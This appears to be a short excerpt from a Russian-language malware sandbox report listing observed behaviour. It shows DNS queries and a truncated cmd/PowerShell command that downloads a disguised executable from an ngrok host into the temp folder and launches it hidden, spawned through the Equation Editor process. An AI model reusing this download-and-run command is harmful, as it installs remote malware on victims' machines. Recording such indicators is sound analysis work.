Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$xZbbKm=$env:temp+'\H.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'https://988f5c12.ngrok.io/al.jpg' -Destination $xZbbKm;(New-Object -com Shell.Application).S...
- DNS ASK 98####12.ngrok.io
- DNS ASK oc##.thawte.com
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$xZbbKm=$env:temp+'\H.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'https://988f5c12.ngrok.io/al.jpg' -Destination $xZbbKm;(New-Object -com Shell.Application).S...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding